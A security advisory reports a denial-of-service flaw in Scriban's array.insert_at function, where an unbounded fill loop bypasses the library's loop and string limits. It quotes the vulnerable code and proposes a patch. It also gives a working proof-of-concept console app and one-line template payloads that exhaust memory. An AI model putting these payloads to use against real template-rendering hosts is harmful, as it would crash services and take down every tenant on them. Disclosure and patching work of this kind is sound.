Scriban: array.insert_at index parameter DoS bypasses LoopLimit and LimitToString

Summary

ArrayFunctions.InsertAt in Scriban allocates index - list.Count null entries in a tight C# for loop with no bound on index. The function is exposed to template authors as array.insert_at, and the fill loop ignores every existing safety control: LoopLimit, LimitToString, ObjectRecursionLimit, and RecursiveLimit. A single template such as {{ [1] | array.insert_at 200000000 'x' | array.size }} causes OutOfMemoryException in well under a second on a host with 1 GB of memory, even when LoopLimit is set to 10 and LimitToString is set to 100. Because OutOfMemoryException is generally not caught by the template renderer or by typical host applications, the vulnerability terminates the host process, not just the template.

This is a sibling vector to GHSA-xw6w-9jjh-p9cr / GHSA-c875-h985-hvrc / GHSA-v66j-x4hw-fv9g, which patched comparable unbounded primitives in string * int, array.size, array.join, string.pad_left, and string.pad_right. The 7.0.0 hardening pass (dde661d "Apply LoopLimit to internal iteration paths" and 4227fde "Harden string padding width limits") swept the equivalent loops in ArrayFunctions and StringFunctions but missed InsertAt.

Details

Reproducible in 7.1.0 (latest tag) and on master at c8094b0.

src/Scriban/Functions/ArrayFunctions.cs:369-386:

public static IEnumerable InsertAt(IEnumerable? list, int index, object? value)
{
    if (index < 0)
    {
        index = 0;
    }

    var array = list is null ? new ScriptArray() : new ScriptArray(list);
    // Make sure that the list has already inserted elements before the index
    for (int i = array.Count; i < index; i++)
    {
        array.Add(null);            // <-- unbounded fill, no StepLoop, no Limit*
    }

    array.Insert(index, value);

    return array;
}

The function is registered as the template builtin array.insert_at (array.fmt-cs and the standard ArrayFunctions ScriptObject reflection registration). It is invoked from a template like [1] | array.insert_at 999999999 "x".

Three properties combine to make this exploitable:

1. There is no context-aware overload. Comparable amplification primitives in this same file received a (TemplateContext, SourceSpan, ...) overload that calls StepLoop per iteration (AddRange, Compact, Concat, Last, Limit, Offset, Reverse, Size, Sort, Uniq, Contains, Each, Filter, Join, Map, Any -- see commit dde661d). InsertAt was not given that treatment. The single IEnumerable, int, object signature is what the engine resolves to, so no host configuration changes its behaviour.

2. The loop itself never consults context.LoopLimit, context.LimitToString, context.RecursiveLimit, or context.ObjectRecursionLimit. There is no upstream call into context.StepLoop, context.CheckAbort, or any guard. With index = 200_000_000, the C# loop calls ScriptArray.Add(null) 200 million times on a List<object> whose capacity doubles geometrically; the JIT-compiled tight loop reaches the .NET array allocator faster than the GC can keep up.

3. OutOfMemoryException is the actual failure mode. Per Microsoft, OutOfMemoryException and friends are not reliably catchable by user code in production CLR runtimes; even when they are caught, large background allocations and triggered GC cycles leave the process in a degraded state. In the PoC below, the renderer wraps the OOM in a ScriptRuntimeException because the underlying allocation lands inside the renderer's try block, but on hosts that allocate the array slightly differently (e.g. tighter memory cap, server GC, or higher index value than the host has memory for) the bare OutOfMemoryException propagates and crashes the AppDomain.

The pattern that matches the existing fixes is to add a context-aware overload that validates index against LoopLimit (or LimitToString for the resulting array footprint) before the fill loop runs, and to mark the unsafe overload [ScriptMemberIgnore]:

[ScriptMemberIgnore]
public static IEnumerable InsertAt(IEnumerable list, int index, object value) { /* current body */ }

public static IEnumerable InsertAt(TemplateContext context, SourceSpan span, IEnumerable list, int index, object value)
{
    if (index < 0) index = 0;
    if (context.LoopLimit > 0 && index > context.LoopLimit)
    {
        throw new ScriptRuntimeException(span,
            $"array.insert_at index `{index}` exceeds LoopLimit `{context.LoopLimit}`.");
    }
    return InsertAt(list, index, value);
}

Same pattern as ArrayFunctions.AddRange, Compact, Concat, Last, Limit, etc., introduced by dde661d, and as StringFunctions.PadLeft/PadRight introduced by 4227fde.

PoC

Standalone .NET 9 console app referencing Scriban 7.1.0 from NuGet.

poc.csproj:

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net9.0</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Scriban" Version="7.1.0" />
  </ItemGroup>
</Project>

Program.cs:

using System;
using System.Diagnostics;
using Scriban;

class Program
{
    static void Run(string title, string template, int loopLimit, int limitToString, int timeoutSec)
    {
        Console.WriteLine($"\n=== {title} ===");
        var ctx = new TemplateContext { LoopLimit = loopLimit, LimitToString = limitToString };
        var tpl = Template.Parse(template);
        var sw = Stopwatch.StartNew();
        try
        {
            var task = System.Threading.Tasks.Task.Run(() => tpl.Render(ctx));
            if (!task.Wait(TimeSpan.FromSeconds(timeoutSec)))
            {
                Console.WriteLine($"  TIMEOUT after {timeoutSec}s -- DoS confirmed");
                return;
            }
            Console.WriteLine($"  output={task.Result?.Length} chars in {sw.Elapsed.TotalSeconds:F2}s");
        }
        catch (AggregateException ex)
        {
            Console.WriteLine($"  EXCEPTION ({sw.Elapsed.TotalSeconds:F2}s): {ex.InnerException?.GetType().Name}: " +
                              $"{ex.InnerException?.Message?.Split('\n')[0]}");
        }
    }

    static void Main()
    {
        // Baseline: small index renders normally.
        Run("baseline",
            "{{ ([1] | array.insert_at 5 'x' | array.size) }}",
            loopLimit: 1000, limitToString: 1048576, timeoutSec: 5);

        // Exploit: 200M index. LoopLimit=10 and LimitToString=100 do NOT protect.
        Run("DoS via array.insert_at index=200_000_000",
            "{{ [1] | array.insert_at 200000000 'x' | array.size }}",
            loopLimit: 10, limitToString: 100, timeoutSec: 30);

        // Exploit: int.MaxValue.
        Run("DoS via array.insert_at index=int.MaxValue",
            "{{ [1] | array.insert_at 2147483647 'x' | array.size }}",
            loopLimit: 10, limitToString: 100, timeoutSec: 15);
    }
}

Build and run inside a memory-capped Docker container so the OOM is actual, not theoretical:

docker run --rm -v "$PWD":/app -w /app -m 1g mcr.microsoft.com/dotnet/sdk:9.0 \
    dotnet run -c Release

Observed output:

=== baseline ===
  output=1 chars in 0.01s

=== DoS via array.insert_at index=200_000_000 ===
  EXCEPTION (0.68s): ScriptRuntimeException: <input>(1,10) : error : Exception of type 'System.OutOfMemoryException' was thrown.

=== DoS via array.insert_at index=int.MaxValue ===
  EXCEPTION (0.52s): ScriptRuntimeException: <input>(1,10) : error : Exception of type 'System.OutOfMemoryException' was thrown.

Two observations:

• The exploit triggers in roughly 600 ms inside a 1 GB container. Increasing the host memory simply moves the OOM threshold; the malicious template still wedges the process for the duration of the allocation and the resulting GC pressure, which is itself a denial of service even when the OOM is suppressed.
• Setting LoopLimit = 10 and LimitToString = 100 (effectively the most paranoid tuning a host could pick) makes no difference. The fill loop is in compiled C#, never goes through StepLoop, and the result is a ScriptArray, not a string, so LimitToString is never consulted.

Impact

Denial of service against any host that renders attacker-controlled or attacker-influenced Scriban templates. This includes the canonical Scriban use cases the README itself lists -- email templating, report templating, in-CMS templating, and Statiq-style static site generators where the template content is part of the data ingested. A single one-line template payload is enough to either OOM the process outright (when the host gives the renderer enough memory headroom for the loop to actually finish) or to wedge the process for tens of seconds while the allocator and GC fight (when memory is tight). On ASP.NET hosts using app.UseScriban-style middleware or background workers running per-tenant templates, the OOM terminates the entire process, taking down all tenants.

Severity is consistent with the four DoS GHSAs already published against Scriban (GHSA-xw6w-9jjh-p9cr High 7.5, GHSA-c875-h985-hvrc High 7.5, GHSA-v66j-x4hw-fv9g High 7.5, GHSA-m2p3-hwv5-xpqw High 7.5). The attack vector, complexity, and impact are identical: network reachable, low complexity, no privileges, no user interaction, full availability impact, no confidentiality or integrity impact. CVSS 4.0 vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N (High, 8.7).